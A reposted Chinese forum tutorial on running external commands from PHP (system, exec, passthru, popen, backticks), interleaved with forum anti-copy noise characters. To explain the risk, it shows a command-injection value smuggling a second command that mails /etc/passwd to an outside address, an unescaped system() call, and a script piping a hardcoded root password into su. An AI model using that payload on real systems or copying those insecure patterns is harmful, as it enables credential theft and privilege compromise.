|
作者:Fluke 中文PHP论坛
) j: B+ a; h! d! i4 J: u E PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。
) i- }/ p- p0 Q4 r# E$ Y2 P 那么,是否可以在PHP脚本中调用外部命令呢?如果能,如何去做呢?有些什么方面的顾虑呢?相信你看了本文后,肯定能够回答这些问题了。 6 W) f& }6 \) c9 y' l0 v) V: G
是否可以?
% m+ H; E+ J2 p5 M6 m& @ 答案是肯定的。PHP和其它的程序设计语言一样,完全可以在程序内调用外部命令,并且是很简单的:只要用一个或几个函数即可。 + h$ y% ^! l' `
前提条件
1 c1 k0 z5 M, z p, q G6 c' C5 J# h0 R 由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门:安全模式。如果运行在安全模式下,那么PHP脚本中将受到如下四个方面的限制: - I% P2 _( }6 j" I2 o" n M( w
执行外部命令 5 n2 b) O' v. v3 C; X
在打开文件时有些限制 + m C5 U; a8 q+ R
连接MySQL数据库 ) x( J- C1 Y4 V
基于HTTP的认证
8 N9 {& |1 Z0 r7 O 在安全模式下,只有在特定目录中的外部程序才可以被执行,对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用safe_mode_exec_dir指令,或在编译PHP是加上--with-exec-dir选项来指定,默认是/usr/local/php/bin。
# F5 J; s& _' t% o5 A+ R$ y 如果你调用一个应该可以输出结果的外部命令(意思是PHP脚本没有错误),得到的却是一片空白,那么很可能你的网管已经把PHP运行在安全模式下了。
- W$ N" ]0 w7 C1 T 如何做? - f& j% z# L3 u) R! _# D# l
在PHP中调用外部命令,可以用如下三种方法来实现: 4 \5 O% f4 p6 I
1) 用PHP提供的专门函数 4 w1 R. {: ]2 S; j7 h( F
PHP提供共了3个专门的执行外部命令的函数:system(),exec(),passthru()。 6 @" I- O5 f1 p+ a U% w1 Z
system() ' U* \/ P" t: j, _' M- M! z
原型:string system (string command [, int return_var])
6 V* ]3 [$ P& o1 c, r* A" Y3 G/ P system()函数很其它语言中的差不多,它执行给定的命令,输出和返回结果。第二个参数是可选的,用来得到命令执行后的状态码。
* [5 `/ ~/ Z' Z6 y' S( ]. C 例子: ( F+ b0 R I1 X
<? ; V( H9 J' }8 _( V# o( \
system("/usr/local/bin/webalizer/webalizer"); ' i$ \6 e. k2 Z0 O. C" R$ T
?> ; S7 F+ ^' b2 j) A5 i& t- I
exec()
7 W* E& @+ x. g+ [. o 原型:string exec (string command [, string array [, int return_var]]) 9 E- P# T" a0 m
exec()函数与system()类似,也执行给定的命令,但不输出结果,而是返回结果的最后一行。虽然它只返回命令结果的最后一行,但用第二个参数array可以得到完整的结果,方法是把结果逐行追加到array的结尾处。所以如果array不是空的,在调用之前最好用unset()最它清掉。只有指定了第二个参数时,才可以用第三个参数,用来取得命令执行的状态码。
9 t8 S; C4 h7 `$ H) |" r9 n 例子: : T# ]3 s( L# v- F- n
<? * \' S; N* Z4 e
exec("/bin/ls -l");
& L z. D7 F* }% L) w# j, y exec("/bin/ls -l", $res); 7 l4 d. [* b6 [
#$res是一个数据,每个元素代表结果的一行
?7 _. q' z7 t; a; `2 b1 D& ^ exec("/bin/ls -l", $res, $rc); ) p' @( v& H, ~# e9 @
#$rc的值是命令/bin/ls -l的状态码。成功的情况下通常是0
$ f( S) l( ~: }) Q* _# c9 z ?> * U, G6 t5 l* z: {/ A
passthru() , U; o4 V2 Z( Y$ K4 O9 v& A+ w
原型:void passthru (string command [, int return_var]) & D$ O) n) q$ b2 W- t& _
passthru()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus(Unix下的一个处理图片的工具,输出二进制的原始图片的流)这样的程序。同样它也可以得到命令执行的状态码。
% W1 d M) y2 `( X! m x* K 例子:
/ f& @' x" X# a) Q8 \) z9 f <? ( K7 u4 `5 ^# ^ w7 R! R
header("Content-type: image/gif");
: l0 v8 f, R/ |7 f* Z5 B F passthru("./ppmtogif hunte.ppm");
; }/ x& {( P5 N1 y6 [* y, M: l ?>
2 k( E0 ?6 |- n 2) 用popen()函数打开进程 % E% M5 y! l" j* g" r+ i5 _, @- @2 r. O
上面的方法只能简单地执行命令,却不能与命令交互。但有些时候必须向命令输入一些东西,如在增加Linux的系统用户时,要调用su来把当前用户换到root才行,而su命令必须要在命令行上输入root的密码。这种情况下,用上面提到的方法显然是不行的。 3 P. q) B( q# G" M6 ^
popen()函数打开一个进程管道来执行给定的命令,返回一个文件句柄。既然返回的是一个文件句柄,那么就可以对它读和写了。在PHP3中,对这种句柄只能做单一的操作模式,要么写,要么读;从PHP4开始,可以同时读和写了。除非这个句柄是以一种模式(读或写)打开的,否则必须调用pclose()函数来关闭它。 0 T/ O5 C, H: ?! `- B6 O0 r6 ?, [4 ~) P
例子1: 9 W2 Q, j, z5 C7 y
<? 3 m% G$ K. G$ W4 |3 \/ e" p
$fp=popen("/bin/ls -l", "r");
# { x4 D- r$ c, ~ ?> 1 Y0 @" I4 _# K' t3 l( |
例子2(本例来自PHP中国联盟网站http://www.phpx.com/show.php?d=col&i=51):
( h6 o( C" F1 v9 o+ X& J- I/ G <?
" R2 d' H7 C2 \- K0 l /* PHP中如何增加一个系统用户 3 w7 p$ t! y( j% D7 }
下面是一段例程,增加一个名字为james的用户,
1 N( S9 r! {/ \' |$ a# U root密码是 verygood。仅供参考 - G7 e) U/ I! p! H0 |
*/
7 j$ c! L: K* C* W$ V' |0 q+ o) @ $sucommand = "su --login root --command"; 5 d; z/ h; M9 S+ [' _
$useradd = "useradd ";
5 i7 c) k7 F0 q& O. X: g( C $rootpasswd = "verygood";
4 u# D' t& y. D: I2 K# M) k $user = "james";
$ ]4 v$ w- @: t! F! S, [ $user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
/ L; A6 u2 Q- t& p- L $fp = @popen($user_add,"w"); 1 {* P2 ]7 g6 N! y
@fputs($fp,$rootpasswd); 6 o! C }; E% {+ l7 ^9 G( E
@pclose($fp);
4 Y4 z" ]% m- { ?>
' P5 H$ ?$ ], f 3) 用反撇号(`,也就是键盘上ESC键下面的那个,和~在同一个上面) * ]1 ]8 J2 |$ j9 Q9 W# C- ^, y
这个方法以前没有归入PHP的文档,是作为一个秘技存在的。方法很简单,用两个反撇号把要执行的命令括起来作为一个表达式,这个表达式的值就是命令执行的结果。如:
) B$ T7 x$ r! w' x& g2 y$ E, g& t <?
! r; o& s' Z: D# `+ P/ t+ m $res=`/bin/ls -l`; & o2 o. H8 @8 [9 @6 d
echo '<b><pre>'.$res.'</pre></b>';
. l. K! q/ A8 i' v- |; l$ ~# v9 S ?> # t1 A2 C+ M) Y! v
这个脚本的输出就象: # e0 F5 X# _4 t, S- _1 b' Y
hunte.gif
. c) n$ h6 g3 U3 y* F hunte.ppm
. B8 A9 Z6 P" O D; J jpg.htm
3 \. z" M$ f+ \, K& ~# i0 c! ? jpg.jpg ! V0 F' b) X3 W0 i$ \$ v
passthru.php ) Z# e5 r$ Z% ]9 C- a* D/ z
要考虑些什么? |7 Z1 c9 V' q. o
要考虑两个问题:安全性和超时。
& Q$ P7 S6 n7 G$ o 先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样: 4 f+ M% g* V+ J
<?
9 O# }# u. J( F* S. Y system("mail $to < products.txt"); ; r5 b0 L2 }7 r6 D p
echo "我们的产品目录已经发送到你的信箱:$to";
, L# T( D2 `' n3 G" K ?>
8 u( S, \3 \7 Y. A* H 用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址: , Q" v7 F9 K2 T5 e* E8 n
'--bla ; mail someone@domain.com < /etc/passwd ;' 1 C5 W% w, R# s. D l2 e, n5 G
那么这条命令最终变成: / h7 O1 @- k) o, F* K9 v9 A& R7 S
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
7 d1 z# h0 J# f- F6 ? 我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。
3 L+ K, S) @1 R; @: `* L) J ~/ a 幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从文件读入(<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。 ) N$ O' f8 v0 Y: d# b1 ^; G2 P
再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如: * ?# A: [& q. r$ p' L* r3 W/ R
<?
1 v2 H g6 t+ W3 g4 H6 i system("/usr/local/bin/order_proc > /tmp/null &");1 `7 q- F0 \2 K0 q
?>% @4 M. q6 m( f" b
| 
IP卡
狗仔卡
发表于 2005-1-16 11:34
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
